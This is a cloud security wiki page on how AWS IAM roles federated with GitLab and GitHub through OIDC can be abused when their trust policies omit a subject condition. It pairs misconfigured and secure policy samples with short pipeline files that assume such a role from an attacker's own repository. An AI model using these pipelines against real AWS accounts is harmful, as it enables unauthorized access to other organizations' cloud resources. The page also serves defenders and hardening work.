Tech with Tyler
LinkedInGitHubYouTube
  • 👋Welcome!
    • whoami
    • !!! Disclaimer !!!
  • 🎓Academy
    • AWS Security Cookbook
      • AWS Control Tower
        • Lab: Deploying AWS Control Tower via Terraform
        • Lab: Blocking Regions with AWS Control Tower
      • AWS CloudTrail
      • AWS GuardDuty
        • Lab: Deploying AWS GuardDuty via Terraform
        • Lab: Logging GuardDuty Findings to S3
        • Lab: Adversary Simulation Detection with Stratus Red Team and GuardDuty
      • AWS Organizations
        • Lab: Deploying AWS Organizations via Terraform
      • AWS Root Account Management
        • Lab: Deploying AWS Root Account Management via Terraform
      • AWS Service Control Policies (SCPs)
        • Lab: Deploying AWS Service Control Policies (SCPs) via Terraform
      • TBD - Coming Soon!
        • [TBD] AWS Account Factory
        • [TBD] AWS Identity Center
    • My content on Cybr
      • Course - Terraform on AWS: From Zero to Cloud Infrastructure
      • Lab - Create Static AWS S3 Website with Terraform
      • Lab - Secure EC2 Access with SSM Session Manager and KMS
      • Lab - Encrypt and Decrypt Data with KMS and Data Encryption Keys
    • My content on PwnedLabs
      • Cyber Range - Electra
      • Lab - Abusing Identity Providers in AWS
      • Lab - Prowler and AWS Security Hub
      • Blog - Abusing Identity Providers in AWS
      • Blog - Building Security Guardrails with AWS Resource Control Policies
      • Blog - Defending Against the whoAMI Attack with AWS Declarative Policies
    • My content on YouTube
      • AWS Security Engineering
      • Linux in 60 Seconds!
  • ☁️Cloud Security
    • AWS Attacks and Techniques
      • Enumerate AWS Account IDs
      • Enumerate AWS IAM Users
      • Enumerate (Unauthenticated) IAM Users and Roles
      • Enumerate AWS Public Resources
      • Enumerate Secrets in AWS
      • Generate AWS Console Session
      • Generate IAM Access Keys from CloudShell
      • Password Spraying AWS IAM Users
      • Subdomain Takeovers
    • AWS Privilege Escalation
      • Identity Access Management (IAM)
      • IAM Trust Policies
      • Key Management Service (KMS)
      • Lightsail
      • OpenID Connect (OIDC)
      • S3
      • Secrets Manager
      • Security Token Service (STS)
    • AWS General Info
      • Amazon Bedrock
      • EC2
      • KMS
      • S3
      • SNS Topic
    • AWS CLI Cheat Sheet
    • Capture the Flags (CTFs)
      • Flaws.Cloud
        • Level 1
        • Level 2
        • Level 3
        • Level 4
        • Level 5
        • Level 6
      • PwnedLabs
        • Escalate Privileges by IAM Policy Rollback
        • Exploiting Weak S3 Bucket Policies
        • Leveraging S3 Bucket Versioning
        • S3 Enumeration Basics
        • Pillage Exposed RDS Instances
        • EC2 SSRF Attack
        • Hunt for Secrets in Git Repos
      • Cybr
        • Challenge - Secrets Unleashed
    • Tools
      • Tooling Index
      • dsnap
      • Pacu
      • s3-account-search
      • GoAWSConsoleSpray
      • aws_consoler
      • cloudenum
  • 📦Containers & Orchestration
    • Kubernetes
  • 👨‍💻Coding & CLI Tooling
    • CLI Tools
      • AWS CLI
      • Git
      • GitHub Copilot (CLI)
      • Homebrew
      • jq
      • ngrok
      • ssh
    • Coding and Scripting
      • Bash
      • Python
    • Terminal Customization
  • ⚙️DevSecOps
    • CI/CD
      • GitLab
    • Hashicorp Terraform
    • Hashicorp Vault
    • IAC Scanning
      • tfsec
    • Secrets Scanning
      • Trufflehog
  • 🎁Miscellaneous
    • Jenkins
  • 💻Operating Systems
    • Linux
      • APT Package Manager
      • CLI Tools Cheat Sheet
      • Man Pages
      • Services
      • Users and Groups
  • 🏗️Projects
    • Active Directory Homelab Automation
    • AWS Cloud Resume Challenge
    • Proxmox Homelab as Code
  • 📌Other
    • Useful Resources
Powered by GitBook
On this page
  • What is OIDC?
  • GitLab OIDC with AWS
  • GitLab AWS IAM Role Misconfigured Trust Policy
  • GitLab AWS IAM Role Secure Trust Policy
  • GitLab Exploiting the Misconfigured Trust Policy
  • GitHub Actions OIDC with AWS
  • GitHub Actions AWS IAM Role Misconfigured Trust Policy
  • GitHub Actions AWS IAM Role Secure Trust Policy
  • GitHub Actions Exploiting the Misconfigured Trust Policy

Was this helpful?

  1. Cloud Security
  2. AWS Privilege Escalation

OpenID Connect (OIDC)

Abusing default or poorly configured Identity Provider IAM Trust Policies for privilege escalation

PreviousLightsailNextS3

Last updated 4 months ago

Was this helpful?

What is OIDC?

  • is an authentication protocol based on the OAuth 2.0 framework that eliminates the need for storing and managing passwords

  • Within AWS, an Identity Provider can be configured for OIDC ID Federation between AWS and the service

  • An IAM Role along with its Trust Policy and Permissions policy is created and tied to the Identity Provider


GitLab OIDC with AWS

  • GitLab and AWS can integrate via OIDC, allowing GitLab pipelines to authenticate and assume an IAM Role within AWS to manage or deploy resources securely

  • If the Role's Trust Policy is misconfigured (or otherwise poorly configured), any GitLab pipeline could authenticate to the AWS account (assuming the attacker has identified the AWS Account ID and IAM Role name), exposing its permissions to attackers

GitLab AWS IAM Role Misconfigured Trust Policy

  • This IAM Role Trust Policy allows any connection from GitLab.com

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::123456789012:oidc-provider/gitlab.com"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "gitlab.com:aud": "https://gitlab.com"
        }
      }
    }
  ]
}

GitLab AWS IAM Role Secure Trust Policy

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::123456789012:oidc-provider/gitlab.com"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "gitlab.com:aud": "https://gitlab.com",
          "gitlab.com:sub": "project_path:Engineering/AWS-Deployments:ref_type:branch:ref:main"
        }
      }
    }
  ]
}
  • This new Trust Policy only allows requests coming from the GitLab Group "Engineering" from the Project "AWS-Deployments" from the "main" branch

GitLab Exploiting the Misconfigured Trust Policy

# .gitlab-ci.yml file 
variables:
  AWS_DEFAULT_REGION: us-east-1
  AWS_PROFILE: "oidc"

oidc:
  image:
    name: amazon/aws-cli:latest
    entrypoint: [""]
  id_tokens:
    GITLAB_OIDC_TOKEN:
      aud: https://gitlab.com
  script:
    - aws sts get-caller-identity

GitHub Actions OIDC with AWS

  • GitHub and AWS can integrate via OIDC, allowing GitHub pipelines to authenticate and assume an IAM Role within AWS to manage or deploy resources securely

  • If the Role's Trust Policy is misconfigured (or otherwise poorly configured), any GitHub pipeline could authenticate to the AWS account (assuming the attacker has identified the AWS Account ID and IAM Role name), exposing its permissions to attackers

GitHub Actions AWS IAM Role Misconfigured Trust Policy

This IAM Role Trust Policy allows any connection from GitHub.com

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::012345678910:oidc-provider/token.actions.githubusercontent.com"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
        }
      }
    }
  ]
}

GitHub Actions AWS IAM Role Secure Trust Policy

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::012345678910:oidc-provider/token.actions.githubusercontent.com"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "token.actions.githubusercontent.com:aud": "sts.amazonaws.com",
          "token.actions.githubusercontent.com:sub": "repo:MyOrg/MyRepo:ref:refs/heads/main"
        }
      }
    }
  ]
}

GitHub Actions Exploiting the Misconfigured Trust Policy

# .github/workflows/main.yml

name: AWS example workflow
on:
  push
env:
  AWS_REGION : "us-east-1"
# permission can be added at job level or workflow level
permissions:
  id-token: write   # This is required for requesting the JWT
  contents: read    # This is required for actions/checkout
jobs:
  exfiltrateData:
    runs-on: ubuntu-latest
    steps:
      - name: Git clone the repository
        uses: actions/checkout@v4
      - name: configure aws credentials
        uses: aws-actions/configure-aws-credentials@v4.0.2
        with:
          role-to-assume: arn:aws:iam::123456789012:role/github # replace with IAM role to assume
          role-session-name: github-role # can be named whatever, shows in AWS logs
          aws-region: ${{ env.AWS_REGION }}

      - name:  get role identity
        run: |
          aws sts get-caller-identity

To resolve this, it's important to specify in the IAM Role's Trust Policy e.g.,

CI/CD Variables are also needed for this to work. See my for setup.

To resolve this, it's important to specify in the IAM Role's Trust Policy e.g.,

☁️
OpenID Connect
additional conditions
blog post here
additional conditions